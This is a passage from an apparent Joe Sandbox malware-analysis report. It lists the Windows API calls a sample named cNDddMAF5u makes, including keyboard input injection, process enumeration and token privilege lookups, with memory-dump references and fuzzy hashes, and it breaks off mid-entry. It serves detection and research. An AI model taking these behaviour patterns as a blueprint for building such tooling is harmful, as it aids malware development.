                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
                                                        • Instruction ID: e657bfb4d8355866fda84097156fb4e2267f30b820b05b1564a4776081ec3f06
                                                        • Opcode Fuzzy Hash: 7dd75ea92fc90a24c15076fffd69a6871c6d42f8891635da1c0c5a2b6ece2596
                                                        • Instruction Fuzzy Hash: 8E41BE71E00344AFD7249F68C841BAABBEAEB88720F11452FF151DB386D771A9018794
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00715783
                                                        • GetLastError.KERNEL32(?,00000000), ref: 007157A9
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007157CE
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007157FA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
                                                        • Instruction ID: 7b69130f704ea68f15aa0611b074ea60db8d8a24db4de6e1144ae4d855b624f7
                                                        • Opcode Fuzzy Hash: 0b583b4e2448a671c0498ecf66d1874711a7792fd6309cbe42667521b48ca950
                                                        • Instruction Fuzzy Hash: 6941FD35600610DFCB15EF15C545A5EBBE2EF89720B19C488E84A6B3A2CB34FD41CF95
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,006C6D71,00000000,00000000,006C82D9,?,006C82D9,?,00000001,006C6D71,?,00000001,006C82D9,006C82D9), ref: 006DD910
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006DD999
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006DD9AB
                                                        • __freea.LIBCMT ref: 006DD9B4
                                                          • Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
                                                        • Instruction ID: 89a73124e8606ef12820abe0ea1de6d31874f63297d84aac9e6bf0b1feae20b3
                                                        • Opcode Fuzzy Hash: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
                                                        • Instruction Fuzzy Hash: E531A072E0021AABDB259F65DC91EEE7BA6EB40310B054169FC04DA390EB36DD51DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00735352
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00735375
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00735382
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007353A8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                        • String ID:
                                                        • API String ID: 3340791633-0
                                                        • Opcode ID: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
                                                        • Instruction ID: 1e7222878f50704243715a23565a02fc2a5a8f67577f662ddea1028c55e660db
                                                        • Opcode Fuzzy Hash: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
                                                        • Instruction Fuzzy Hash: 2431C534A95A0CEFFB309F14CC06BE83765EB05398F584101FA10961E2C7BC9D80DB46
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0070ABF1
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0070AC0D
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0070AC74
                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0070ACC6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
                                                        • Instruction ID: ea1ed921546819bce06bc48b11cc64dc9aa43812754b01e73d6def0601fe5827
                                                        • Opcode Fuzzy Hash: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
                                                        • Instruction Fuzzy Hash: C931E130A04758FFFB25CB658C09BFF7BE6AB89310F05831AE485961D1D37D898587A2
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0073769A
                                                        • GetWindowRect.USER32(?,?), ref: 00737710
                                                        • PtInRect.USER32(?,?,00738B89), ref: 00737720
                                                        • MessageBeep.USER32(00000000), ref: 0073778C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
                                                        • Instruction ID: f7864ce93ab967b1cb4511743ddf6d6805f7c2815db6f2eb5bab507551c63fad
                                                        • Opcode Fuzzy Hash: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
                                                        • Instruction Fuzzy Hash: 2341C0B4605254EFEB25CF58C895FA977F4FF49350F5980A8E5149B262C338E942CF90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 007316EB
                                                          • Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
                                                          • Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
                                                          • Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65
                                                        • GetCaretPos.USER32(?), ref: 007316FF
                                                        • ClientToScreen.USER32(00000000,?), ref: 0073174C
                                                        • GetForegroundWindow.USER32 ref: 00731752
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
                                                        • Instruction ID: fec6c9fda4c5ca408ef7dd098c4d7876a296b129e8e12f43b028974c390da8a0
                                                        • Opcode Fuzzy Hash: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
                                                        • Instruction Fuzzy Hash: ED314171D00149AFD700EFA9C885CAEBBFDEF89304B5480A9E415E7252DB359E45CFA4
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0070D52F
                                                        • CloseHandle.KERNEL32(00000000), ref: 0070D5DC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: 9e196fbaa336588afb67213b7981c2aed9ad3af9a680bd19d64987900aea3bf3
                                                        • Instruction ID: 17459cf83d3dfdc8c4e5939f205efd14e9039bd210cd0e38999b055c7f14d320
                                                        • Opcode Fuzzy Hash: 9e196fbaa336588afb67213b7981c2aed9ad3af9a680bd19d64987900aea3bf3
                                                        • Instruction Fuzzy Hash: C631AF71008300DFD315EF94CC81AAFBBE9EF9A354F140A2DF581921A1EB759E45CBA2
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • GetCursorPos.USER32(?), ref: 00739001
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006F7711,?,?,?,?,?), ref: 00739016
                                                        • GetCursorPos.USER32(?), ref: 0073905E
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006F7711,?,?,?), ref: 00739094
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
                                                        • Instruction ID: 78a230e9abb3d059965ba90498fe5a279fa2333dca14c2e7422b13f19352e374
                                                        • Opcode Fuzzy Hash: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
                                                        • Instruction Fuzzy Hash: 6B21E535600118EFEB2A8F94CC58EFA7BB9EF49350F148055F60557262C379AD90DF60
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0073CB68), ref: 0070D2FB
                                                        • GetLastError.KERNEL32 ref: 0070D30A
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0070D319
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0073CB68), ref: 0070D376
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
                                                        • Instruction ID: 56eb907476ba225c1e1843c4611bf8d9b14e7ec5c71e496e1f430daf27627b88
                                                        • Opcode Fuzzy Hash: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
                                                        • Instruction Fuzzy Hash: 72215970508301DFC720EF68C88186AB7E4AA56364F104A1DF499932E1EB399D46CB97
                                                        APIs
                                                          • Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
                                                          • Part of subcall function 00701014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
                                                          • Part of subcall function 00701014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
                                                          • Part of subcall function 00701014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
                                                          • Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007015BE
                                                        • _memcmp.LIBVCRUNTIME ref: 007015E1
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00701617
                                                        • HeapFree.KERNEL32(00000000), ref: 0070161E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
                                                        • Instruction ID: 5d5303642d2a52d68172994d89729c57e2f563e34c4970c63387177d934c1107
                                                        • Opcode Fuzzy Hash: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
                                                        • Instruction Fuzzy Hash: B1219A71E00108EFDB00DFA4CD45BEEB7F8EF40345F498559E441AB281EB39AA44DBA0
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0073280A
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732824
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732832
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00732840
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
                                                        • Instruction ID: ba5e5ae3b2656262d3860de7ba73c19fa8f310f2e3a1178de20337305286c00e
                                                        • Opcode Fuzzy Hash: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
                                                        • Instruction Fuzzy Hash: AB21C131204121AFF7159B24C855FAA7B96AF85324F248158F4268B6E3CB79FC42CB90
                                                        APIs
                                                          • Part of subcall function 00708D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708D8C
                                                          • Part of subcall function 00708D7D: lstrcpyW.KERNEL32(00000000,?,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00708DB2
                                                          • Part of subcall function 00708D7D: lstrcmpiW.KERNEL32(00000000,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708DE3
                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707923
                                                        • lstrcpyW.KERNEL32(00000000,?,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707949
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707984
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 181bcc2d271513238e482ff255257f7a950265715c241d9c223a99e761ead392
                                                        • Instruction ID: 47fd2a87b9569087bb9e9c2e2e788ca8307d7e5a93c8a292569384b0e11c4ccc
                                                        • Opcode Fuzzy Hash: 181bcc2d271513238e482ff255257f7a950265715c241d9c223a99e761ead392
                                                        • Instruction Fuzzy Hash: FE11067A200201FBDB159F34CC45D7A77E9FF45350B40812AF842C72A4EB35E811D7A5
                                                        APIs
                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 007356BB
                                                        • _wcslen.LIBCMT ref: 007356CD
                                                        • _wcslen.LIBCMT ref: 007356D8
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID:
                                                        • API String ID: 455545452-0
                                                        • Opcode ID: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
                                                        • Instruction ID: 9c704c9eed9cba8f5d431a18e6198f7185fd956a3670c77bc493d6df45b8825d
                                                        • Opcode Fuzzy Hash: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
                                                        • Instruction Fuzzy Hash: C211B171600618D6EB20DF658C86EEE77ACEF11760F50806AF915D6082EB789A80CB64
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00701A47
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A59
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A6F
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A8A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
                                                        • Instruction ID: 07875626d4c2c0a5c067c9373627ac1f45355e87ff86866b07fa087b240981ca
                                                        • Opcode Fuzzy Hash: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
                                                        • Instruction Fuzzy Hash: BC11277AA01219FFEB11DBA4CD85FADBBB8EB08750F204191EA00B7290D6716E50DB94
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 0070E1FD
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0070E230
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0070E246
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0070E24D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
                                                        • Instruction ID: 677e0c96268b3ac1ab7e6fc497e1ce76bf1ceafbefd9fcc5e74b21e40d18c65d
                                                        • Opcode Fuzzy Hash: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
                                                        • Instruction Fuzzy Hash: 3D110872904218BBD7019BAC9C09AAE7FACEB45355F008719F914E32D0D278C90087A5
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,?,006CCFF9,00000000,00000004,00000000), ref: 006CD218
                                                        • GetLastError.KERNEL32 ref: 006CD224
                                                        • __dosmaperr.LIBCMT ref: 006CD22B
                                                        • ResumeThread.KERNEL32(00000000), ref: 006CD249
                                                        Memory Dump Source
